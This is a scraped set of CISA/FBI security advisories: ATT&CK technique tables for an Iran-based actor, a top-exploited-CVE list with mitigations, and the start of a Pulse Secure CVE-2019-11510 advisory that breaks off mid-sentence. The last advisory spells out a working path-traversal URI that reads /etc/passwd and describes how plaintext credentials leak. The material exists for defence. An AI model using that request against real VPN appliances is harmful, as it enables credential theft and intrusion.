\n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:35:47", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the broader U.S. Government are providing this technical guidance to advise IT security professionals at public and private sector organizations to place an increased priority on patching the most commonly known vulnerabilities exploited by sophisticated foreign cyber actors.\n\nThis alert provides details on vulnerabilities routinely exploited by foreign cyber actors\u2014primarily Common Vulnerabilities and Exposures (CVEs)[[1]](<https://cve.mitre.org/cve/ >)\u2014to help organizations reduce the risk of these foreign threats.\n\nForeign cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations. Exploitation of these vulnerabilities often requires fewer resources as compared with zero-day exploits for which no patches are available.\n\nThe public and private sectors could degrade some foreign cyber threats to U.S. interests through an increased effort to patch their systems and implement programs to keep system patching up to date. A concerted campaign to patch these vulnerabilities would introduce friction into foreign adversaries\u2019 operational tradecraft and force them to develop or acquire exploits that are more costly and less widely effective. A concerted patching campaign would also bolster network security by focusing scarce defensive resources on the observed activities of foreign adversaries.\n\nFor indicators of compromise (IOCs) and additional guidance associated with the CVEs in this Alert, see the each entry within the Mitigations section below. Click here for a PDF version of this report.\n\n### Technical Details\n\n## Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\nU.S. Government reporting has identified the top 10 most exploited vulnerabilities by state, nonstate, and unattributed cyber actors from 2016 to 2019 as follows: CVE-2017-11882, CVE-2017-0199, CVE-2017-5638, CVE-2012-0158, CVE-2019-0604, CVE-2017-0143, CVE-2018-4878, CVE-2017-8759, CVE-2015-1641, and CVE-2018-7600.\n\n * According to U.S. Government technical analysis, malicious cyber actors most often exploited vulnerabilities in Microsoft\u2019s Object Linking and Embedding (OLE) technology. OLE allows documents to contain embedded content from other applications such as spreadsheets. After OLE the second-most-reported vulnerable technology was a widespread Web framework known as Apache Struts.\n * Of the top 10, the three vulnerabilities used most frequently across state-sponsored cyber actors from China, Iran, North Korea, and Russia are CVE-2017-11882, CVE-2017-0199, and CVE-2012-0158. All three of these vulnerabilities are related to Microsoft\u2019s OLE technology.\n * As of December 2019, Chinese state cyber actors were frequently exploiting the same vulnerability\u2014CVE-2012-0158\u2014that the U.S. Government publicly assessed in 2015 was the most used in their cyber operations.[[2]](<https://www.us-cert.gov/ncas/alerts/TA15-119A>) This trend suggests that organizations have not yet widely implemented patches for this vulnerability and that Chinese state cyber actors may continue to incorporate dated flaws into their operational tradecraft as long as they remain effective.\n * Deploying patches often requires IT security professionals to balance the need to mitigate vulnerabilities with the need for keeping systems running and ensuring installed patches are compatible with other software. This can require a significant investment of effort, particularly when mitigating multiple flaws at the same time.\n * A U.S. industry study released in early 2019 similarly discovered that the flaws malicious cyber actors exploited the most consistently were in Microsoft and Adobe Flash products, probably because of the widespread use of these technologies.[[3]](<https://www.recordedfuture.com/top-vulnerabilities-2019/>) Four of the industry study\u2019s top 10 most exploited flaws also appear on this Alert\u2019s list, highlighting how U.S. Government and private-sector data sources may complement each other to enhance security.\n\n## Vulnerabilities Exploited in 2020\n\nIn addition to the top 10 vulnerabilities from 2016 to 2019 listed above, the U.S. Government has reported that the following vulnerabilities are being routinely exploited by sophisticated foreign cyber actors in 2020:\n\n * Malicious cyber actors are increasingly targeting unpatched Virtual Private Network vulnerabilities. \n * An arbitrary code execution vulnerability in Citrix VPN appliances, known as CVE-2019-19781, has been detected in exploits in the wild.\n * An arbitrary file reading vulnerability in Pulse Secure VPN servers, known as CVE-2019-11510, continues to be an attractive target for malicious actors.\n * March 2020 brought an abrupt shift to work-from-home that necessitated, for many organizations, rapid deployment of cloud collaboration services, such as Microsoft Office 365 (O365). Malicious cyber actors are targeting organizations whose hasty deployment of Microsoft O365 may have led to oversights in security configurations and vulnerable to attack.\n * Cybersecurity weaknesses\u2014such as poor employee education on social engineering attacks and a lack of system recovery and contingency plans\u2014have continued to make organizations susceptible to ransomware attacks in 2020.\n\n### Mitigations\n\nThis Alert provides mitigations for each of the top vulnerabilities identified above. In addition to the mitigations listed below, CISA, FBI, and the broader U.S. Government recommend that organizations transition away from any end-of-life software.\n\n## Mitigations for the Top 10 Most Exploited Vulnerabilities 2016\u20132019\n\n**Note:** The lists of associated malware corresponding to each CVE below is not meant to be exhaustive but instead is intended to identify a malware family commonly associated with exploiting the CVE. \n\n_**CVE-2017-11882**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products\n * Associated Malware: Loki, FormBook, Pony/FAREIT\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\n_**CVE-2017-0199**_\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1\n * Associated Malware: FINSPY, LATENTBOT, Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>\n\n_**CVE-2017-5638**_\n\n * Vulnerable Products: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1\n * Associated Malware: JexBoss\n * Mitigation: Upgrade to Struts 2.3.32 or Struts 2.5.10.1\n * More Detail: \n * <https://www.us-cert.gov/ncas/analysis-reports/AR18-312A>\n * <https://nvd.nist.gov/vuln/detail/CVE-2017-5638>\n\n_**CVE-2012-0158**_\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0\n * Associated Malware: Dridex\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa19-339a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2012-0158>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\n_**CVE-2019-0604**_\n\n * Vulnerable Products: Microsoft SharePoint\n * Associated Malware: China Chopper\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2019-0604>\n\n_**CVE-2017-0143**_\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0143>\n\n_**CVE-2018-4878**_\n\n * Vulnerable Products: Adobe Flash Player before 28.0.0.161\n * Associated Malware: DOGCALL\n * Mitigation: Update Adobe Flash Player installation to the latest version\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-4878>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133d>\n\n**_CVE-2017-8759_**\n\n * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7\n * Associated Malware: FINSPY, FinFisher, WingBird\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-8759>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>\n\n_**CVE-2015-1641**_\n\n * Vulnerable Products: Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1\n * Associated Malware: Toshliph, UWarrior\n * Mitigation: Update affected Microsoft products with the latest security patches\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2015-1641>\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133m>\n\n_**CVE-2018-7600**_\n\n * Vulnerable Products: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1\n * Associated Malware: Kitty\n * Mitigation: Upgrade to the most recent version of Drupal 7 or 8 core.\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2018-7600>\n\n## Mitigations for Vulnerabilities Exploited in 2020\n\n**_CVE-2019-11510_**\n\n * Vulnerable Products: Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15 and Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n * Mitigation: Update affected Pulse Secure devices with the latest security patches.\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-107a>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-11510>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**CVE-2019-19781**_\n\n * Vulnerable Products: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SDWAN WANOP\n * Mitigation: Update affected Citrix devices with the latest security patches\n * More Detail: \n * <https://www.us-cert.gov/ncas/alerts/aa20-020a>\n * <https://www.us-cert.gov/ncas/alerts/aa20-031a>\n * <https://www.fireeye.com/blog/products-and-services/2020/01/fireeye-and-citrix-tool-scans-for-iocs-related-to-vulnerability.html>\n * <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>\n * <https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>\n\n_**Oversights in Microsoft O365 Security Configurations**_\n\n * Vulnerable Products: Microsoft O365\n * Mitigation: Follow Microsoft O365 security recommendations\n * More Detail: <https://www.us-cert.gov/ncas/alerts/aa20-120a>\n\n**_Organizational Cybersecurity Weaknesses_**\n\n * Vulnerable Products: Systems, networks, and data\n * Mitigation: Follow cybersecurity best practices\n * More Detail: <https://www.cisa.gov/cyber-essentials>\n\n## CISA\u2019s Free Cybersecurity Services\n\nAdversaries use known vulnerabilities and phishing attacks to compromise the security of organizations. CISA offers several free scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors.\n\n**Cyber Hygiene: Vulnerability Scanning** helps secure your internet-facing systems from weak configuration and known vulnerabilities. It also encourages organizations to adopt modern security best practices. CISA performs regular network and vulnerability scans and delivers a weekly report for your action. Once initiated, this service is mostly automated and requires little direct interaction. After CISA receives the required paperwork for Cyber Hygiene, our scans will start within 72 hours and you\u2019ll begin receiving reports within two weeks.\n\n**Web Application Service** checks your publicly accessible web sites for potential bugs and weak configurations. It provides a \u201csnapshot\u201d of your publicly accessible web applications and also checks functionality and performance in your application. \nIf your organization would like these services or want more information about other useful services, please email [vulnerability_info@cisa.dhs.gov](<mailto:vulnerability_info@cisa.dhs.gov>).\n\n## CISA Online Resources\n\nThe Patch Factory: CISA infographic depicting the global infrastructure for managing vulnerabilities.\n\n[CISA Alert: (AA20-120A) Microsoft Office 365 Security Recommendations](<https://www.us-cert.gov/ncas/alerts/aa20-120a>): recommendations for organizations to review and ensure their O365 environment is configured to protect, detect, and respond against would-be attackers.\n\n[CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>): a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.\n\n### Contact Information\n\nIf you have any further questions related to this Joint Alert, please contact the FBI at either your local Cyber Task Force or FBI CyWatch.\n\n * You can find your local field offices at <https://www.fbi.gov/contact-us/field>\n * CyWatch can be contacted through e-mail at [cywatch@fbi.gov](<mailto:cywatch@fbi.gov>) or by phone at 1-855-292-3937\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\n### References\n\n[[1] Cybersecurity Vulnerabilities and Exposures (CVE) list](<https://cve.mitre.org/cve/>)\n\n[[2] CISA Alert (TA15-119A). Top 30 Targeted High Risk Vulnerabilities. (2016, September 29)](<https://www.us-cert.gov/ncas/alerts/TA15-119A>)\n\n[[3] Recorded Future. 2019 Vulnerability Report: Cybercriminals Continue to Target Microsoft Products. (2020, February 4)](<https://www.recordedfuture.com/top-vulnerabilities-2019/>)\n\n### Revisions\n\nMay 12, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-12T12:00:00", "type": "ics", "title": "Top 10 Routinely Exploited Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-1641", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-8759", "CVE-2018-4878", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-05-12T12:00:00", "id": "AA20-133A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:35:59", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse>) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n## Background\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/>) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/>) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133>) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021>) for _Lateral Movement _[[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/>) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486 ]](<https://attack.mitre.org/versions/v7/techniques/T1486>) for impact, as well as\n * _Exfiltration _[[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/>) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5/acc`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5/acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297>),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) a user password from the VPN appliance. To do this, CISA created a _user realm _(Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies _[[T1090 ]](<https://attack.mitre.org/versions/v7/techniques/T1090>)\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber 